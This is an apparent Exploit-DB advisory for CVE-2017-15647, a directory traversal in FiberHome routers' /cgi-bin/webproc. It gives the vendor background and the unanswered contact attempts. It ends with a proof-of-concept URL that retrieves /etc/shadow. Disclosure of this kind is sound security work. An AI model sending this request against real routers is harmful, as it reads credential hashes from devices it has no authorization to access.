FiberHome - Directory Traversal

EDB-ID:

44054




Platform:

Linux

Date:

2017-10-13


## Vulnerability Summary
The following advisory describes a directory traversal vulnerability found in FiberHome routers.

FiberHome Technologies Group “was established in 1974. After continuous and intensive development for over 40 years, its business has been extended to R&D, manufacturing, marketing & sales, engineering service, in 4 major areas: fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to- end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.”

## Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

## Vendor response
Update 1:

Cve issued: CVE-2017-15647

We tried to contact FiberHome since September 6 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.

## Vulnerability details
User controlled input is not sufficiently sanitized when passed to /cgi-bin/webproc.

/cgi-bin/webproc receives getpage= as parameter input.

When we pass the directory of a file as a parameter input with parameter var:page, we will get the file from the router.

## Proof of Concept

```
http://+IP+ /cgi-bin/webproc?getpage=/etc/shadow&var:language=en_us&var:page=wizardfifth
```